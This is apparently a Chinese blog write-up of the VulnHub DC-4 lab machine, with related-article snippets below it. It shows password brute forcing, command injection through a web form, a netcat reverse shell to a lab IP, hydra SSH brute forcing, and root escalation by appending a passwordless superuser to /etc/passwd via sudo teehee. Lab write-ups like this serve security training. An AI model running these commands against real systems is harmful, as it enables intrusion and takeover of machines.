靶机DC-4

最新推荐文章于 2024-08-15 22:15:24 发布
最新推荐文章于 2024-08-15 22:15:24 发布
阅读量359 收藏 3
点赞数 4
分类专栏: 靶场 WEB Linux 文章标签: 网络安全 linux 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IDHALASHAO/article/details/140480447
版权
WEB 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
靶场
11 篇文章 0 订阅
订阅专栏
Linux
4 篇文章 0 订阅
订阅专栏

信息收集

访问web界面

命令执行

admin是个用户,爆破密码happy

登录之后,提交请求都会有回显,抓包

可以看到请求的df+h,加号是空格

换成其他命令:radio=cat+/etc/passwd&submit=Run是有回显的

写入shell失败,命令执行反弹shell

nc -e /bin/bash 192.168.56.128 8086(nc+-e+/bin/bash+192.168.56.128+8086)空格用+号代替,也可以直接进行url编码

提权

可以看到有三个用户,分别打开只有jim里边是密码字样的配置信息

这里用户下为啥有密码,可能这就是靶场吧,上面已经知道开启了ssh,可以进行爆破

hydra -l jim -P /dc-4.txt -t 5 ssh://192.168.56.146

账号:jim 密码 :jibril04

查看mbox的内容,看到有邮箱提示:来自root用户的信

去邮箱看到:/var/spool/mail 这里是前面提到的三个用户的:charles,以及给了密码:^xHhA&hvim0y

看一下有没有sudo授权,发现可以无密码执行/usr/bin/teehee

提示teehee具有root权限

teehee命令可以往一个文件追加内容,通过它向/etc/passwd写入内容,新增一个超级用户kun123

向passwd文件中追加一个超级用户

echo "kun123::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换到超级用户:kun123

小结:用到的用户也就是jim和charles,要是前者能提权就省事了,不过靶机都是有提示,都是最后要提权,估计后面的靶机提权也不重样

参考:

DC-4靶机渗透测试详细教程_dc-4教程-CSDN博客

摘星怪sec
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2110
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
靶机 DC-4
m0_66299232的博客
09-19 332
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写。4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下4.发现了另外一个账户,并且文中有该账户的密码。既然我们获得了旧密码,也获得了账户。命令执行
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3698
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
靶机DC-4—WP
m0_66638011的博客
06-22 983
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
DC-4靶机
mlws1900的博客
03-24 1069
下载不下来用迅雷下载。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1550
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
靶机实战-DC-4
滕财然的博客
02-26 313
DC-4靶机实战 文章目录DC-4靶机实战1、主机发现2、端口及端口详细信息扫描3、访问web服务(80端口)4、提权 这个靶机一开始扫不到IP,改一下虚拟机设置,然后重启就ok了 1、主机发现 目标IP为:192.168.232.168 2、端口及端口详细信息扫描 发现目标开放22、80端口 3、访问web服务(80端口) 只有一个登录框,没有验证码,尝试弱口令 弱口令无果,用bp爆破: ...
靶机DC-1攻略
weixin_43179779的博客
10-07 1141
dc-1靶机靶机攻略
066 渗透测试实战,靶机 DC-4
鸡蛋炒鸡蛋
04-29 438
文章目录一:环境准备 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 打开DC-4
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8402
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
linux:有关目录、链接文件的函数 Makefil、gdb的使用
T66656的博客
08-15 1035
功能:根据用户id到/etc/passwd文件下解析获得结构体信息参数:uid:用户id返回值:成功返回id对应用户的信息失败返回NULLpasswd结构体的定义通常如下所示。
Linux~MySQL数据库具体操作
最新发布
javaMov的专栏
08-15 346
第二种:mysql -u root -p -e "CREATE DATABASE my_new_database;performance_schema : #【默认】:系统运行的状态信息,性能信息的存储库;语法:【mysqldump -uroot -p1 [备份参数] > /路径/文件名.sql】information_schema :【默认】:系统运行的状态信息,性能信息的存储库;2.-B 数据库名 #备份指定数据库的数据信息。-B 数据库名 #备份指定数据库的数据信息。注意:需要先关闭数据库进行操作。
Linux Bridge VLAN
qq_42477169的博客
08-15 1029
H3CH3C的S5120系列交换机锐捷:CISCO:Arista:中兴:web配置改为桥接后会激活 CPU 的临时软桥接,是传统的 linux bridge ,此时 hardware offload 不会介入,所有的数据包处理通过 CPU 转发华硕ASUS:RT-AX53U。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值